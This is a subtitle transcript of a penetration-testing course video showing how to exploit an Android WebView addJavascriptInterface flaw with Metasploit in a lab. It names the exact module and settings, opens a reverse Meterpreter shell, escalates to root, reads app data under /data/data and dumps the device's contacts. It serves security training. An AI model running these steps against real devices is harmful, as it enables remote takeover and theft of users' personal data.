1
00:00:00,080 --> 00:00:06,060
- Hello all, and welcome to the new video of Android Security and Exploitation,

2
00:00:06,060 --> 00:00:11,330
training course by PentesterAcademy. My name is Aditya and I'm your course

3
00:00:11,330 --> 00:00:16,540
instructor for this entire training series. So, in this particular video, we

4
00:00:16,540 --> 00:00:22,080
are going to have a look at how we can exploit webview-based vulnerabilities with

5
00:00:22,080 --> 00:00:28,670
Metasploit. So, in case we have a device, and, maybe, an application which is

6
00:00:28,670 --> 00:00:34,520
vulnerable to webview, we can set up a web server, using Metasploit, which,

7
00:00:34,520 --> 00:00:41,740
basically, intercepts the response and adds some malicious component, which gives

8
00:00:41,740 --> 00:00:45,960
you a reverse Meterpreter session. Now, in case you are not familiar with

9
00:00:45,960 --> 00:00:52,900
Metasploit, it's an exploitation framework, by Rapid7. It has a bunch of

10
00:00:52,900 --> 00:00:58,250
different modules, which you can use for exploitation, so you can exploit, maybe,

11
00:00:58,250 --> 00:01:03,260
networks, web applications, or any other component. So, in this case, we're going

12
00:01:03,260 --> 00:01:11,140
to exploit Android applications. Let's start up the Kali VM. In this particular

13
00:01:11,140 --> 00:01:17,360
video, we are going to switch to another VM, which is known as Kali. So, once you

14
00:01:17,360 --> 00:01:22,840
have downloaded and installed the Kali VM, you then simply go and start up

15
00:01:22,840 --> 00:01:30,470
Metasploit, by typing msfconsole. It might take a bit of time for Metasploit to load

16
00:01:30,470 --> 00:01:36,070
up, so let's just wait for a while. I'll just pause the video and start it back

17
00:01:36,070 --> 00:01:44,430
again. Okay, so now that Metasploit has been loaded, we can go ahead and use the

18
00:01:44,430 --> 00:01:49,530
exploit. So, the exploit module, in this case, is

19
00:01:49,530 --> 00:01:59,390
exploit/android/browser/webview_addjavascriptinterface. We'll just do use

20
00:01:59,390 --> 00:02:06,653
exploit/android/browser/webview_addjavascriptinterface. Each module

21
00:02:06,653 --> 00:02:12,723
has different options, which you can see by typing show options, right.

22
00:02:13,650 --> 00:02:21,527
In this case, we see that it has several options, like srvhost, srvport, ssl,

23
00:02:21,527 --> 00:02:29,054
uripath, localhost, and localport. So, first of all, let's go ahead and add the

24
00:02:29,054 --> 00:02:34,980
local host, which is our local IP address, which you can find out by typing ifconfig.

25
00:02:36,990 --> 00:02:48,459
So the IP address, for us, is 192.168.161.134. I'll just do set lhost this particular IP

26
00:02:48,459 --> 00:02:54,526
address, and let's also go ahead and set up a uripath, which is the path of the web

27
00:02:54,526 --> 00:03:00,659
server, to host the malicious content. So let's give it the name vulnerable, right.

28
00:03:00,659 --> 00:03:11,918
Now, let's start up the exploit. So it says that the server has started, at this

29
00:03:11,918 --> 00:03:22,186
particular URL. Let's, first of all, remove the proxy, so that the connection

30
00:03:22,186 --> 00:03:28,461
doesn't get disconnected in the middle. So, I'll just remove the proxy. And now

31
00:03:28,461 --> 00:03:34,527
I'll start a browser, and go to this particular IP address. So it should be

32
00:03:34,527 --> 00:03:47,782
192.168.161.134:8080/vulnerable, right. If you look over here, there will be a

33
00:03:47,782 --> 00:03:55,456
Metasploit Meterpreter session being opened. So it sends the payload, and then we have

34
00:03:55,456 --> 00:04:00,440
the final Meterpreter session opened. Now, Meterpreter is one of the most amazing

35
00:04:00,440 --> 00:04:06,580
payloads for Metasploit. So, once the session gets open, we can then interact

36
00:04:06,580 --> 00:04:13,270
with the sessions by giving the session id, which, in this case, is 1. So,

37
00:04:13,270 --> 00:04:21,470
once we are into the Meterpreter, we can execute a bunch of different commands. So,

38
00:04:21,470 --> 00:04:26,310
if you just do a ps, it will show you a list of all the running processes, on the

39
00:04:26,310 --> 00:04:33,610
Android device. Right. So, you have the vulnerable.attify.webviewapp and all these

40
00:04:33,610 --> 00:04:39,740
other applications. You can also type in a question mark, to give you all the

41
00:04:39,740 --> 00:04:46,810
other commands, which you can use. Also, you can type in shell, to get into the

42
00:04:46,810 --> 00:04:52,420
Android shell, and execute commands over there. So, if you type in id now, it will

43
00:04:52,420 --> 00:04:58,260
give you the id, when being run from the Android shell. So, if you also do a su,

44
00:04:58,260 --> 00:05:03,420
which gives you the root privileges, and then do id, you see that you're now

45
00:05:03,420 --> 00:05:11,260
root, right. And now, you can basically go to any location of any application. So,

46
00:05:11,260 --> 00:05:16,360
let's, for this case, go to vulnerable.attify.webview, which is

47
00:05:16,360 --> 00:05:30,100
located at /data/data. And... So it should be webviewapp, let's fix this, right. So,

48
00:05:30,100 --> 00:05:35,300
we have all the files and folders over here. And I can see any information I want

49
00:05:35,300 --> 00:05:42,810
to. Right? So, this is what you can do with webview-based vulnerabilities. Let's

50
00:05:42,810 --> 00:05:49,400
terminate the channel. If the device is vulnerable, you can also dump all this

51
00:05:49,400 --> 00:05:56,180
information. So, if you simply run this, it says, "No contacts found." Let's see

52
00:05:56,180 --> 00:06:12,430
if any of these actually work. Do I actually have contacts on my device? See.

53
00:06:12,430 --> 00:06:24,540
Phone. Contacts. Let's add a contact. And see, if this one actually works. Any

54
00:06:24,540 --> 00:06:36,190
random number. So, it says that the contacts have been dumped. And

55
00:06:36,190 --> 00:06:56,560
ls. Exit. Exit. Sorry. See, and if you do contacts_dump, you'll have the contact

56
00:06:56,560 --> 00:07:02,360
information here. Right. So, this is how you can play around with Metasploit, and

57
00:07:02,360 --> 00:07:07,510
do a lot of different things. Right. So, that's all for this video, and that's all

58
00:07:07,510 --> 00:07:12,930
for webview-based vulnerabilities. It's one of the most critical vulnerabilities,

59
00:07:12,930 --> 00:07:16,960
which you can try to identify and exploit in a lot of new, different

60
00:07:16,960 --> 00:07:21,940
Android applications. So, in case you have any feedback or queries, feel free to

61
00:07:21,940 --> 00:07:28,927
reach out to me @adi1391 on Twitter, or you can mail me at adi@attify.com.

62
00:07:28,927 --> 00:07:30,860
Thanks for watching the video.